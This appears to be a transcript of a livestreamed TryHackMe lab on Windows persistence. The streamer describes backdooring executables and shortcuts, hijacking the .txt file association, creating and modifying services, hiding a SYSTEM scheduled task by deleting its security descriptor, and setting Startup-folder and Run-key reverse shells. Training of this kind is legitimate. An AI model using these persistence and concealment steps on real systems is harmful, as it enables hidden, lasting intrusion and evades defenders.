good stuff, like right there. That's some good trash. It's a good tool. All right, there we go. All right, cool. And then from here, Obviously did that. And we got our netcat listener up and running right. And we get our callback up here. So I like that. That's pretty cool, like right there. Let's go ahead and now let's rename it Putty. And let's oh, it's denied. Let's see if we can actually change this to Putty. Let's go ahead and copy Putty x.exe to Putty.exe. Let's see if we can do that. Oh, being used by another process. Ah, yes, it is. Not anymore. Oh, it's not anymore. Oh, Putty's being used? Why is Putty being used? Command tax C sc stop Putty. Maybe? Nah, it's not called Putty. I was hoping the service would be called Putty. Because it's being used by another process. You know, if we could remote desktop into there, we might be able to stop it. I don't know what the hell Putty would be called for a service. We can't go into command prompt, tax C sc qc Putty. Is that a thing? No. Alright. Well, we did it with Putty X. I want to put it in Putty. I feel like we can. We can always put it into another thing like plink or something like that. So, but we're probably going to mess with that later on. We're probably going to have to delete it by that time. Or we got puttygen.exe. Let's go ahead and rename it. So we'll copy puttyx.exe into puttygen.exe or something like that. Start up a netcat listener back up here again. And let's run puttygen because that file is... And we do get a callback. Let's go! Alright, cool. I like that. That's pretty cool. Alright, let's make it sneakier. Shortcut files. If we don't want to alter the executable, we can always tamper with the shortcut file itself instead of pointing directly to the expected executable. We can change it to the point of the script that we will run the backdoor on. Hate to see it. I just want to kind of copy that whole thing. Bam. Hate to see it. Alright, let's go ahead and do a... I believe the administrator did actually have, we saw in the very beginning, a shortcut file, and I was wondering why it was in there. And it is desktop. We know why now. Uh-oh. You know what that means? We're going to have to, probably, we're going to have to actually get a remote desktop. It means we're probably got to shut this box down, terminate them, and restart it. Let's go ahead and do that. Good thing we're just sitting like right here, so it should be an easy day. Maybe we don't. Yeah, we do. Because we're going to have to actually get in there, do all that good stuff to it. Yeah, okay, let's go ahead and terminate this box. We'll restart him. Who knows? Maybe THM user 3 will work. Probably not. This might actually be... we'll go on for a little bit longer. All right, well, that guy's starting up. Let's go ahead and we'll take a 5-minute break. We'll be back. We've been going for about an hour and 15 minutes so far. So let's go ahead and restart this box, and we'll go on from there. All right, you know what? Fuck it. Hey, let's go ahead and let's start this off now. All right. So only post it once. The keyword, okay? Only post it one time. It's going to be for the red team field manual. If you live in a different country, I won't be able to send it to you. All right. Once you get it, hit me up on Discord, and we'll send the red team field manual to your house. All right. Oh, Christian Thomas Lopez just subscribed on YouTube. Hey, thanks a lot. All right, so I think if I hit roll it like right now, I think it's just going to start it. I don't think it's going to actually. So because I can put a keyword in there. Automatically marks. Okay. This one is a test. Nobody wins on this one. This one's a test. I just want to see something like real quick. Okay, go ahead and type in RTFM. That's going to be the giveaway freaking thing like right there. The giveaway code. That's going to be super easy. I don't have to give away anything. It's going to be easy as fuck. Okay. Yeah, that was easy as shit. That was an easy day. Let's go ahead and grab this guy. Oh, really? That's pretty funny. Did you subscribe on YouTube? Because subscribe on YouTube wouldn't be very funny. It'd just be you subscribing on YouTube. Let's go ahead and try remote desktop back in this guy again. Hey, it's not going insane this time. So that's good. There we go. All right, cool. So we are now going to mess with the actual little file here itself, right? So we are going to mess with... We're going to call for backdoor.ps1. And within that backdoor, we can probably throw something in there. And it looks like we're going to make this guy probably backdoor. For hijacking the shortcuts target, let's create a simple PowerShell script to see Windows System 32 or another sticky location. The script will execute a reverse shell and then run calc.exe from the original location on the shortcuts properties. Okay, let's go ahead and do that. We'll grab this guy right here. And we're also good. Obviously, sc64.exe is already on this box, right? So let's go ahead and hop into here. We're just going to put it on the desktop. We're not going to put it in a sneaky location. We're just going to go ahead and we'll do a notepad. And we'll call this backdoor.ps1. We obviously want to put an RIP address of 10.13.26.184. We also want to create a listener, right? For port 445 it has on here, right? All right, and that's going to calculate, and that's going to open up calculate.exe, and it's going to be a Windows hidden, so they're not going to be able to see it, right? So we're just going to put it right on the desktop like right there. We'll go to File. We'll save as backdoor.ps1. All right. So we can save that. And I actually have no idea what the hell I just saved that at. Save as. And we want to put it into his desktop. And we'll call it backdoor.ps1. Alright, so there's our PowerShell script, like right there, right? Not very sneaky, but just want to see it. Everything like that. So it looks like we're going to do no new window, and then we're going to open up calculator.exe. Now we got to go to calculator.exe, right click, and we're going to go to properties. And we're going to have this guy call back to C, users, administrator, desktop, and then backdoor.ps1. There we go. We'll go ahead and we'll apply that. We'll hit OK. And he's actually just changed to calculator. He actually just changed to a PS1 file now because that was the target. Oh, it wants us to make it like that. I see. Maybe it won't actually change the window style then. No, it definitely changed the window style still. But we don't want it there. We want it C, users, administrator, slash desktop. Apply that. We'll say OK. And now we are going to double click on calculator and we should get a backdoor back over here. Should. And it should also run calculator, which it did. And we also got our backdoor. Who am I? And we are administrator. Cool. Awesome. Sweet. Awesome day. Okay, so let's go ahead and take some notes of that, like right there. Let's go ahead and open up this guy. Go ahead and go to our properties on this guy, and calculator did still open up, which is awesome. That's great and all. Cool. And we also opened up PowerShell version 1, which I don't know if I really would have done that, but okay. All right, and then we got a reverse shell. Excellent. All right, cool. There we go. It's definitely identity theft. There's no one else probably in the world with that name. Christian Thomas Lopez. I'm sure there's nobody else in the world with that name. Nobody. All right, so we got that to work. I don't know where we're supposed to get all these flags from. Like, were we supposed to get a flag after that? Guess we're getting a flag after this, like right here. Oh, can we actually run that now? Probably not, huh? Now I think about it, most likely not. Oh yeah, we can. Look at that. That one actually worked. Cool. Tonian, how you doing? All right. Last one we got here is hijacking file associations. Well, you usually open the specific file type. Damn, that's real bad. Why don't we start with that? That one sounds horrible. Hijacking file associations. All right. Let's go ahead and do this like right here. So the default operating system file associations are kept inside the registry where a key is stored for every single file type under HKLM software classes. let's say we want to check which program is used to open .text files. We can just go and check for the .text subkey and find the programmatic ID, prog ID, associated with it. The prog ID is simply an identifier to a program installed in the system. For .text files, we will have the following prog ID, text file. Okay, cool. Guess it's time to go into the registry editor, huh? Registry editor. All right, here we go. Let's go. So it was in HKey local machine software classes. So local machine software classes. And we have all these. So whatever file falls underneath there. So we can go down to text.txt files. Oh, that was not really what I wanted, like right there. Maybe it was, I don't know. Text file. Bam. Is that what we want, like right there? I don't think that's what we want. Hey, thanks a lot for follow, Cattle Pet. Is that what we want, like right there? He's got .txt. We found text file. I think I might have went a little bit too far down here. Look for the dots. It's like a roller coaster for a registry editor, you know? Just Speedy Gonzalez here, just flying back up. Dun, dun, dun. All right. So we want to find .text. There's .text, but we want to find txt. Haha! We found it. It's going, whoopsie days. Well, yeah, that'll work. That works fine. Whoopsie days, that won't. There we go. Next is going to be, you can then search for a subkey for the corresponding prog ID, also under HKLM software classes, in this case text file. We found that, where we will find a reference to the program in charge of handling .text files. Most prog ID entries will have a subkey, shell open command, where the default command to be run for files with the extension is specified. So the default thing to run that is notepad.exe, I see. Yes. Okay. Which makes sense. Okay. In the case when you try to open a text file, the system will execute notepad.exe, where %1 represents the name of the open file. If we want to hijack this extension, we can replace the command with a script that executes the backdoor and then opens the file as usual. First, let's create the following script. Let's. Let me go ahead and actually print screen all of that also. We'll copy that. We'll throw that over in here. Is the registry edit just keys and hard-coded flags? For me, it's just a big mess. I can't get the hang of it. Always. Yeah, it's just pretty much it's just like flags for the system to call on stuff. Whenever you click on something, it goes back to registry editor and looks at what to actually do. That's pretty much what it does. All right, so we want to create a backdoor.ps1, and we'll go ahead and we'll throw this into, let me see here. He wants us PS1 script, save it to context C, Windows backdoor 2.ps1. We could probably just save it to the desktop again so we can actually see it and everything like that. Obviously, you wouldn't do that for realsies, but we can like right now. Let's go ahead and open up Notepad again. That's not what I want to do. There we go, Notepad. And we'll make that. All right, let me go ahead and copy this like real quick. Back over into my notes. There we go. All right, and from here, we'll go ahead and throw in our attacker IP of 10.13.26.184 on port 4448. So let's go into a file, save as, and we'll call this backdoor 2.ps1. And there it is, like right there, right? So that's all good. So from here, what we want to do is we want to get back into, it looks like the actual text file itself. So if we come back over to registry editor, and we press T, we get all the way down here, and we can go to text file. There it is. I just saw it. T-E-X-T, text file. All right, there we go in shell. And I believe it was open you went to, right? Command. And there it is. This is what we want to mess with, like right here. Right? And this one's actually going to, I wonder if there's one that's txt file, another one that's text. Let's find out. TXT file. Ho ho. See, we almost messed that up, didn't we? Shell, well, I say we. I really mean me. I almost messed that up. This isn't not speaking French here, right? All right. So now we want to do our PowerShell, attack window hidden, and everything like that. And then we do a %1. Okay, let's go ahead and do that. Value data is actually going to be PowerShell. It's going to be PowerShell. I believe it's TAC C, right? TAC Windows hidden style. Windows style hidden. C Windows backdoor. Okay, so TAC Windows style hidden. And then what's a run? And we have it as C users administrator. Desktop / backdoor2.ps1. And I think I'm supposed to put that %1 at the very end, don't I? %1, yes. Okay, so let's go ahead and do this. Double click on him again, go to end, and then we'll do space, %. Whoops, %1. Okay. So now we have that like right there. And is it Windows style or just Windows style? Windows style. I messed that up. Okay, so Windows style hidden. Then we'll say okay for that. There we go. Copy that. We'll go ahead and we'll throw that back into our stuff. And I kind of want to just type that out too. So I can just copy and paste next time. There. All right, cool. Let's go ahead and I guess try to run a text file now. Finally, create a listener, wait for your reverse shell, and open up a.txt file. So we can just make a file and try to open it like real quick, I guess, huh? So let's go ahead and create a listener for 4448. And see tech LVMP 4448. That's like what we were listening on. According to that file like right there, right? We'll go ahead and we'll exit off here. And we can probably just make a quick text file. We'll just go into PowerShell like real quick. CD into desktop. And we'll do a... Oh, that does not exist. You're right. Okay, CD into desktop. We're doing echo. Test. Into test.txt. And now we should have a test.txt file like right here. Let's go ahead and open that up. I guess with Notepad. And did we get a reverse shell? We 100% did not. Was I supposed to open up a PowerShell or something? That time it actually, there we go, let's go. I guess I had to tell it to open up a Notepad first. And we have, that worked. All right, cool. Let me go ahead and show that I made a test file. Awesome. That was pretty sweet. Okay, cool. All right. Let's go ahead and copy that. And we'll go ahead and we'll throw that over in here. All right, cool. Let's go ahead and do we'll try to grab that flag 6 like right there. Go ahead and copy that, and we'll throw that down to here. All right, awesome. All right, so if you want to be part of the giveaway, you live in America, you have an FPO or FPO address. If you don't live in America, then you have to have an FPO address. Go ahead and type in RTFM at this time. How long is live? Only a little bit more. Looks like this, RTFM. If you live in America and actually have American address. And you got to hit me up on Discord and actually give me your address. So that's also another thing too. It's also how much do you trust me? But we're going to have a giveaway for a Red Team Field Manual if you want to be part of it. Hey, thanks a lot for the follow, Joe to Dev. We'll probably be live for about another hour. That'll be about it. Is it worth it? I mean, I think so, but I've also been subscribed for a long time, and I have a lot of the boxes done. So you go with no one wants Red Team Field Manual. Got it. All right, abusing services. All right, let's go ahead and do one for abusing services now. All right, so we create, okay, so Windows services offer a great way to establish persistence since they can be configured to run in the background whenever the victim machine is started. If we can leverage any service to run something for us, we can regain control of the victim machine each time it is started. Why you don't upload live videos? Literally every single video is actually uploaded. What do you mean? Every single video is uploaded to YouTube. A service is basically an executable that runs in the background. By configuring a service, you can find which executable will be used and select if the service will automatically run when the machine starts or should be manually started. There are two main ways we can abuse services to establish persistence. Either create a new service or modify an existing one to execute our payload. All right. So we'll grab all that. We'll copy that over to here. So they want us to create a service called THM service. That's going to pretty much change the administrator's password to password 123. Start equals auto. Then it wants us to start that service. So the administrator's password is about to change. I'm thinking, no, we're going to have to do it this way. Never mind. I'll say, I'm thinking that we get in and we make a whole different service. That's awesome. Awesome. I like to hear that. Larry King, I like to hear that. That's awesome. You know what you didn't learn is that that's not the correct IP address. That's something I don't teach, is how to put in the correct IP address for what you're attacking. 10.10.106.194. So we are going to start. So we're pretty much going to tell it to do an SC execute, right? To create a service called THM service, all right? The bib path, we're going to say, hey, change the administrator's password to password 123, start equals auto. I don't know if this is actually going to work in EvoWinRM. We're going to try it, or in PowerShell. I don't know if we actually need to go to the sc.exe executable portion of it for it to be able to find that, or if that can be ran from anywhere. I think sc.exe can be ran from anywhere. Okay, so we have to actually go to sc.exe, or we can go to command prompt. So we got to come over to here. We'll go to command prompt and we'll run it here. All right, so that service has now been started, or created, excuse me. Now, if we start that service, which we can, we will change the administrator's password. So if we do that, the administrator's password now be password 123 with PASSWD123. All right, so let's go ahead and do that. We can see that, SC start, and we call the THM service. Let's go ahead and throw that in there. And it pretty much told us to fuck off, but we can actually try to run something, I guess, as an administrator and see if we have to put in a password. Let's log out. We'll log back in and see which password it's going to be. If it's password 123 or PASSWD123. Let's see which one it is. Let's go ahead and exit out of here. We'll log back into it. Under administrator. I'm going to try his old password first. Capital PASSW0D321. And that didn't work. Let's go ahead and try that PASSWD123. And that one did work. So obviously we have now changed his password with that service. Yes, it is important. Depending on what level you're at. All right, so we reset a user's password, right? Cool. That's great and all. Let's go ahead and make a reverse shell. All right. So we're going to make a THM service 2. We're going to make a reverse shell, and we are going to call it THM service 2. And it's going to point to this rev service.exe, which is what we're going to call this MSF Venom file. And we got to listen on port 4448 again, it looks like. So let's go ahead and do that like real quick. We'll exit out of here. Port 4448. Let's go and hop into here. We'll make that service. Oh, not there. Whoopsie daisy. We'll go ahead and throw that in there. Throw RIP into there, right, of 10.13.26.184. We're going to call it rev service.exe. Obviously, you would name it something else in real life. We'll go ahead and we'll throw that onto this machine up here. And we'll throw it into C Windows it wanted to throw into, right? C Windows, go ahead and throw it in there. We already have a Python server startup over here, so we should just be able to throw it right up into there. That's actually not going to work because our password is now changed to password 123. That's not a hash. Thank you very much, EvoWinRM. And let's go ahead and cd into C Windows. And we will do a wget http 10.13.26.184. Rev service.exe, right? Our file will be rev service.exe. Then we go back into command prompt over here. And we can go ahead and do a sc create. Right, this time the bin path is going to be C Windows. Let's go and copy all that. The service is going to be service 2. Bin path is going to equal C Windows. rev service.exe. All right. That should work. Start equals auto. sc.exe create. Oh, you want to know why? There we go. This app can run on your PC to find a version of your PC. Okay. Access is denied. Oh, wow. All right, let's try it without the x64. That's weird. That's a new one for me. Should be exactly what we have to do, right? Yep, that is exactly what we have to do. But it says that it cannot run on our machine, that app. So let's go ahead and try to do a... We should be able to. I mean, it did it before. But let's go ahead and just do this again. We'll get our new one up there. That's not an x64. Let's go ahead and try to do that again. Why? Because it's an executable service? Okay, so we have to actually be in Windows to be able to do that. Okay, let me go ahead and make a print screen of this guy right here. So we can show that we actually should be able to do the x64. That should be fine. And this one was called Create Backdoor Services, right? Abuse Services, yeah. Still under Abuse Services, okay. And we will go ahead and we will show that we put them over to here. We can copy that. And we will go ahead and we will throw him into, show that we have now created a service over here. We will copy that. And I believe I already have my listener up and running over here. So let's go ahead and start up that service. So we will do an sc start, thm service 2. And we should get a callback over here. And we do. Who am I? And I am Entity Authority System. Let's go. And we are Entity Authority System over here. Which is probably going to give us problems with getting the flag, actually. Recopy that. And we'll try to grab that flag. Probably going to have problems getting it because we're Entity Authority System. I see that before. It wants us to actually be administrator. It's a little bit annoying, but let's try it. See? Because we're Entity Authority System. So... Why you delete the Jackbox video? Because Jack was all messed up. And that one and the domain controller, the DC one that I just uploaded, I think those two were around the same exact time. I think the mic went out at some point and I didn't realize it. So it's only like 40 seconds of talking, then all of a sudden it just goes out. That's why. So there's nothing in there. So we can't actually do it because we're Entity Authority System. Literally, that's the reason why. This is like the third time now we haven't been able to grab a flag when we've done what we're supposed to do, and we're just not able to grab it. Little bit annoying. By a little bit, I mean like a lot of it. But whatever. Modifying existing services. All right. Works quite well. Blue Team may monitor new service creation across the network. We may want to reuse existing service instead of creating a new one to avoid detection. I did not know you could do a query state all. That is freaking cool. Let me go ahead and go to services over here like real quick and throw that in there. I'm just always just good luck. Okay. So let's go ahead and do an SC query all for this thing. And obviously we're going to get a lot of them. Let's go ahead and get this guy a little bit bigger for everybody. All right, so there's our THM service 2, THM service. All right, so we obviously want to mess with one of these that we can actually mess with, right? We don't know which ones those are because we don't see the rights on them, but there are ways to be able to do that within PowerShell. Hey, thanks a lot, man. Thank you very much. All right, so let's go ahead and you should be able to find a stop service called THM service 3. We should. It's probably going to be in the T's. Those ones we just created, so those ones are going to be the newest ones. So we probably just got to scroll up. We should actually be able to look up services. Can I do that like right there? What about, instead of scrolling up and looking through everything, we do an SCQC. THM service 3. And then we see that it is on auto start. I don't know if we have the rights for it. I mean, we obviously we're administrator, but let's go back down to here. Where is it? Privs. We have persistence. Existing services. All right, there we go. Okay, let's go ahead and do some stuff with this existing service. So we found the existing service, right? We actually did that like right there, okay? And it's sitting in see my service THM service. So we can see that like right here, right? So let's go ahead and head over there. CD into C, my service, THM service. Or just my service, excuse me. That's the executable. Well, it's supposedly sitting there, but can't find the path for it. So it may not actually exist. Yeah, I don't think it actually exists. That's why. That service, like right there. So let's go ahead and create another reverse shell here. Right, this time it looks like we're listed on 5558. It wants us to list on there. We're going to do a 10.13.26.184. We'll call rev service 2.exe. It's going to exit out here. NC LVMP 5558. All right, let's go ahead and do a wget. We'll actually cd. Yeah, we can leave it like right there, I guess. Let's see here. Where does it want us to actually put it? Into C windows. Okay. So we can actually just put it right back into C windows. So we'll do a wget. And we're just going to call this rev service 2.exe and then rev service 2.exe. Remember, my Python is still sitting up over here. My web server, right? So we got that, okay? Cool. Let's go ahead and thank you very much. It's not expiring soon. We have like an hour and 20 minutes. All right, let's go ahead and we already queried for it. So we're good with that. But let's go ahead and do a config for it now. And now if we do an SCQC THM service 3, we can see that it's now pointing to C Windows rev service 2.exe, right? So let's go ahead and throw that into here. There we go, right? Go ahead and we'll put a nice little box around him too. Just be like, hey, look where it's pointing now. So let's go ahead and throw that over here. And let's go ahead and start up that service, which then should give us our reverse shell. over onto this guy right here that's listing on 5558. SC start, THM service 3. And we do have a reverse shell. Who am I? And I'm at the authority system. So I'll probably have a problem grabbing that flag. Maybe not, because I think we're supposed to be running it as local system. Maybe not for this one. Let's find out. Oh, there we go. We got that one at least. Couldn't get 7, but we can get 8. Okay, cool. All right. Awesome. Let's go. Actually, I have to show it starting first. Just in case I have a brain fart and totally forget how to start something. There we go. And then we have it right over here. All right, cool. Why do I live stream in YouTube? Because I'm under the Twitch partner or whatever it is. Not the part, whatever it is, the lower level one. So once you get to there, you can't live stream in YouTube. That's why. Let's go ahead and do abusing scheduled tasks like real quick. And I think this is going to be my last one for tonight. And then we'll do the rest of them tomorrow night. I think. We'll see. I mean, there isn't anyone else on like right now. Maybe. Probably going to be my last one for tonight. Let's go ahead. We'll see. We'll see how long it is. How about that? Doesn't actually look too bad. So, and abusing scheduled tasks isn't really that difficult either. So we'll probably keep this up and running actually. Probably do a couple more things after this. All right, let's go ahead and make a little new thing down here. Abusing scheduled tasks. This can also be used for privilege escalation, abusing scheduled tasks. All right, depending on how they're abused and things like that, and what's actually running, and who has, who's actually allowed to be able to mess with it, things like that. So scheduled tasks can be, I think you guys saw me do it with in Raw or Raw 2 or something like that. We abuse the scheduled task, right? Just gonna copy all this over first, like real quick. Then we'll go through, we'll read it, and we'll accomplish those. Let's go. This might be the last one for tonight. All right, let's go ahead and read through this guy, and we'll look at him like real quick. We can also use scheduled tasks to establish persistence if needed. There are several ways to schedule the execution of a payload in Windows systems. Let's look at some of them. Task scheduler, the most common way to schedule a task is using the built-in Windows task scheduler. All right, the task scheduler allows for granular control of when your task will start, allowing you to configure tasks. It did not expire. Stop lying to me. Did it expire? Did you actually expire? You had an hour and 20 minutes left and you fucking expired? You douche. That's what I thought. You still have an hour and 14 minutes left, dude. Calm down. All right. Let's go back down to here. Let's create a task that runs a reverse shell every single minute. In a real world scenario, you wouldn't want your payload to run so often, but we don't want to wait too long in this room. Real life scenario, you have it run like every hour, or depending on how much time frame you have, you might even have it run like once a day or like once a week or something like that. If you're like advanced persistent threat kind of stuff, maybe once a freaking month. You know what I'm saying? Something like that. So then it's not easily picked up on. So let's go ahead and create a scheduled task, right? So that's our very first thing here. Schedule task, create, boom, boom. And we're going to call for netcat, right? Let's go to run command prompt to the attacker IP. And it wants it to look like it's going to run in a system like right there. Let's go ahead and do this. 10.13.26.184. All right, I'm going to go ahead and throw that into my notes just so I can copy and paste next time. That makes your life way easier. All right. So let's go ahead and run that. And we will start up a listener. on port 4449 because this technically should run a scheduled task every minute. As we can see, we got the minute like right there. And it's going to be called THM backdoor task. Let's go ahead and start up our listener. Whoopsie daisy. Which Kelly? This is 22.2 or something like that. I think this one's 22.2. I just downloaded it again. So it's not old. But it's on GNOME. I like the GNOME desktop. Other people don't. It's a good thing Kelly came out with a bunch of desktop distributions, you know. So that we can all have what we like. Some people they really don't like it. Sorry to hear that. And we get a call back. They say it uses too many resources. I say I got freaking a lot of RAM. And a lot of hard drive space. And a lot of SSD space. So we have the resources for it to be able to use. But we do get our call back. Freaking cool. Alright. Let's go ahead and see what else they want us to do with this. Oh, you won't get the flag. Oh, no. Alright, so the previous command will create THM task backdoor, task, and execute an SC4 reverse shell. The SC and MO indicates that the task should be run every single minute. The RU option indicates the task will be run as system privileges. Check our task was created successfully. Okay, we already did that. We already have the callback. Making our task invisible. Our task should end up running by now, but if the compromised user tries to list the scheduled task, our backdoor will be noticeable. It will. To further hide our scheduled task, we can make it invisible to any user in the system by deleting the security descriptor. The security descriptor is simply an ACL. Hey, thanks a lot for the follow, Drazo. Simply an ACL that states which users have access to the scheduled task. If your user isn't allowed to query a scheduled task, read up two things underneath Nightbot, like right there. Deleting the SD is equivalent to disallowing all users access to the scheduled task, including administrators. Hate to see it. All right. So let's go ahead and go into the registry editor. And we'll try to hop into there. And we're going to go to computer HQ local machine, it looks like. So let's go ahead and get way up. Computer HQ local machine. From there, we're going to software, Microsoft Windows NT. What if I could just do something like this? Software, Microsoft, yep. That's nice. Windows NT. That's very nice. I like that. Thank you, Windows. Thank you very much. Windows NT, current version, schedule task cache tree. Okay. Current version. Schedule task. Schedule. Task cache. Tree. THM backdoor. There we go. There's all that, right? Boom. You will find a registry key for every single task under the name, under which a name-valued SD contains security descriptor. You can only erase the value if you hold system privileges. Well, I think about it, we're not system like already P'd into system, but we can be if we do this, huh? Entire task, let's delete the SD value. Change your task before creating. Before do so, use PS exact available and C tools to open a reg edit with system privileges. Okay, let's go ahead and do that. Let's go ahead and run that like real quick. Let's see if registry opens again. Did we just turn in the system? Okay, let's go ahead and copy this like real quick. So we hop like right back into here. Exit out of there. We'll do it again. Open that guy up. Go back into here. And then we'll try to delete it now. Let's go. Yeah, the live streams, like what's on Twitch goes straight to YouTube. That is the live streams. Like I don't have any live streams on YouTube. It's just literally the Twitch live streams are being recorded and put onto YouTube. So this one is like 2 hours long, like right now. I don't live stream on YouTube. All right, if we try query our service task again, it won't show up. Let's go ahead and try that. All right, cool. It does not show up. You are 100% correct. All right. We already have our callback. So let's go ahead and grab that last flag like right there. And we did everything else that we need to do. Let's go ahead and grab that last flag. And there we go. That one is finished. Okay, logon trigger persistence. I think we're going to stop right here for today. And we'll start with logon triggered persistence tomorrow. Especially since it has 4 flags in there, and only like 2 of them will work. So let's go ahead and we'll call it a day for today. Thanks a lot for sticking around. Thanks for all the different stuff. Let's see if anyone's on. Hey, Chappy Noob's on. There we go. Let's go. All right, cool. Perfect timing. Thanks a lot for sticking around. Remember, on Saturday, we are going to have the giveaway. All right. So if you live in America or have an FPO address, you can sign up for the giveaway. Just remember, you do have to give me your address on Discord. So I guess it really depends on how much you feel about that. Big stream or day after? Day after. Saturday. Saturday me is going to be Friday East Coast, about 8, 9 p.m. East Coast time. Is where I'm going to start at, which will be Saturday 9, 10 a.m. Japan time. Let's try to raid THM. It's just a matter of time. Whoops. So, yeah. Not tomorrow, day afterwards, but it's all confusing because of the time difference. But it should be Friday night, East Coast time in America, between 8 and 9 p.m. Friday night. And then we'll do it somewhere in between all of that. Like I said, thanks a lot for sticking around. You guys all have a good one, and I'll talk to you all later.
Both. I have an allergy thing going on at the moment, so there might be a lot.
All right, we're back on. Whoopsie daisy. There we go. Back on TryHackMe. We are on login triggered persistence. That's the next thing that we're on here for the Windows local persistence stuff. So let's go ahead and go through this guy. So I already logged in through remote desktop into the administrator account here. All right, so we're good on that. Like right there. Let's go ahead and try to make it a little bit prettier here. Oh God, I don't like doing that. I gotta shut it down by accident. Log back in. If you don't remember, the password is password 321, which I obviously typed in wrong with the capital P. And we should be able to do something. There we go. All right, cool. So we're back in here. Let me go ahead and get this bigger, too, in case we have to use PowerShell at all. And we'll go from here. So because the voice, like YouTube keeps like deleting the voice off the video. So there's only like 30 something seconds of voice on it. So that's now been the second one that's happened to. So I'm probably going to redo that Hack the Box one. And then we'll probably redo that DC one. I don't remember which one it even was. But we'll probably redo them. But yeah, YouTube keeps deleting the voice. So, alright. Some action performed by a user might be bound to executing specific payloads for persistence. Windows operating systems present several ways to link payloads with particular interactions. This task will look at the ways to plant payloads that will get executed when the user logs into the system. Alright. So each user has a folder. Yep. Okay, that's a thing where you can put executables to run whenever the user logs in. Yes, that is true also. So let's go ahead and we'll make this reverse shell. It wants it on port 4450. Let's go ahead and make this guy like right here. Let me go ahead and actually take a print screen like real quick first. I feel like I already know what we're going to do. Then we'll copy that. I'll throw that in my notes. That's not where we're supposed to go at. Logon trigger persistence. Alright, so we'll go ahead and we'll throw this into there. Whoops, that's not going to work. I'll host equals 10.13.26.184, right? My tunnel IP address. That's my ton 0 IP address. Notes are on GitHub. Under overgrown carrot 1. They should be updated again around Tuesday. Alright, so we got that right. So now we have something called Rev Shell, and it's on port 44050. Let's go ahead and netcat 4450. And we'll go ahead and we'll throw this guy into wherever he wants us to throw it to. So he wants us to throw it into which user? Program data Microsoft Windows Startup. Oh, so for any user that gets on. Okay, so let's go ahead and do that. So we're going to CD into here. I wonder if we can just upload it straight to there. Probably because that's, we're going to have to put some quotation marks around this guy. Because that space like right there. There we go. All right, cool, because start menu has that space in it. So let's go ahead and, let me see if our notes ended that. Okay, program startup. So we went ahead, we made that MSF Venom file now, right? And from here, we'll go ahead and we'll do a wget over here. HTTP 10.13.26.184. If I could type. 13.26.184 slash, and we called it Rev Shell. Let's go ahead and start up a Python server also over here so we can actually do that wget correctly. There we go. And then we'll do attack out file. And we'll call it that. Let's see if we can upload it into here. Oh, maybe I should actually do HTTP, not HTTP. There we go. Let's see if we can actually, and we can. So we uploaded it in there, right? So we got that guy now. So if we do a dir, we should have revshell.exe in here. Awesome. All right. Now all we got to do is just sign out, sign back in. I don't know who wants to sign in as. Now be sure to sign off your session. We'll sign back in. We'll see if we get that reverse shell. Let's go ahead and do that like real quick. Let's go ahead and sign out. We'll sign in. And we should get a reverse shell. Password 321. We still haven't got one yet. 4450, right? Executable. So, looks like we just got it. There we go. So, executable star programs, and we got our reverse shell, right? Who am I? And we are administrator. So, that one worked like right there. Awesome. Go ahead and print screen this over here, just so I can show like, yep, we made a reverse shell. Copy that. From here, put it in the file or in the directory above. C, program data. Now we could just do this for a user also. There we are. SSH login doesn't work? What do you mean? Do you have an SSH login, or like you're trying to SSH into something and you don't know the credentials? Gonna need a little more info on that one. Let's go ahead and grab that, and we'll see if we can run it over here. Let's try to do it with our reverse shell. And there we go. So we now have that one like right there for 10. Let's go ahead and drop it down to here. All right, cool. Let's go on to our next one, right? So our next one is run once. Oh, let me go ahead and show that we got a reverse shell over here real quick. That did actually work. We'll say all right, now we have our run once. You can also force a user to execute a program and log in via the registry. Instead of delivering your payload into a specific directory, you could use the following registry entries to specify applications to run at logon. So we'll say registry logon. We'll say that. And we'll go ahead and do this like right here. And copy that guy. Throw him over there. The registry entries under HKCU will only apply to the current user, and those under HKLM will apply to everyone. Huh, okay. Any program specified under the run keys will run every time the user logs on. Programs specified under the run once keys will only be executed a single time. Okay, so let's go ahead and create another MSF Venom file. We'll put our attack report as 10.13.26.184. This is going to overtake our other rev shell. That's okay. We're going to be listening on port 4451 now. You have credentials and SSH isn't working. What box are you on? Are the credentials correct? Are the credentials actually used to SSH in? The credentials might be used for something like FTP or SMB or something like that, and you might not actually be able to SSH. Maybe he doesn't have SSH login. Maybe no one's allowed to SSH login. I don't know. After transfer to the victim machine, let's move into the C windows. Okay, so let's go ahead and get that over to the victim machine now. We'll go ahead and we'll do something like this. So let's get that file over to the victim machine, then we'll move it over to C windows, or we can just put it right there in the beginning. So let me go ahead and take a print screen of this up here. And let's go ahead and create our Python server. Copy that reverse shell. And we'll go ahead and we will hop into PowerShell or command prompt, whichever one. Let's go ahead and do a wget. Uh, 10.13.26.184 / rev shell. Out file is going to be rev shell, right? Then we'll go ahead and we'll copy that over into C Windows. So copy rev shell into C Windows. There we go. All right. Now from here, we are supposed to do a little, let's then create a reg expand SZ registry under here. Okay. So we want to go to computer. So let's go ahead and get back into registry editor, right? Let me get this a little bit bigger for everybody. All right, there we go, registry editor. And we will go into HKey local machine software. HQ local machine. Software. All right. Microsoft Windows current version run. So software, Microsoft Windows. Current version. And then run, right? All right, there we go. So we're now there. And then we're going to put in my backdoor and then have it point to wherever it's supposed to go. So we can go ahead and right click. New. I don't know what they put in. New string key. What do you guys want to put in? Let's say create a reg expand as Z. I think you put in. I wonder if we can we just copy this. It's kind of hoping we just copy that guy. What are you? Are you a string? I guess it's a string value. Nope, that's not going to work. New binary value? Nope, that's obviously not going to work. Oh, it's probably D word, huh? Nope, that's actually a D word. Delete that. How the hell do we create a new reg expand as V? Expandable string value I'm going to go with? Expandable string value. Okay, so let me go ahead and let me delete that one and show that part of it. Right click, new, expandable string value. I want to print screen this guy like right here. Boom. And let me go ahead and make a little box around here. Hey, we want to click on that. And we are up here and here. There we go. All right, let's go ahead and copy that. From here, we can do a little whoop. All right. We'll create that new expandable string value. We'll call him rev shell. And we'll go ahead and we will modify him. And our value data is going to be to C Windows and then our rev shell, right? So C Windows rev shell.exe. So we're going to C Windows rev shell.exe. There we go. Let me go ahead and print screen that like right there. All right. And from here, after doing this, sign out your current session, log in, you should receive a shell. One small issue here is that we're already going to receive a shell because we're still in the other one. We're still in here. So let's go ahead and delete this one first. Because we're still going to receive a shell from there. So let's go ahead and CD into there. And we'll delete that rev shell. So it runs the other one that we just put in there, right? Because if I do a dir, it's still here. So delete that rev shell. There we go. Now let's sign out. If I go to C Windows, we should have a rev shell in here. And it should be an executable. It's right there. Okay. Now let's sign out and sign back in. No, you can SSH without a TryHackMe subscription. Works just fine. What box are you 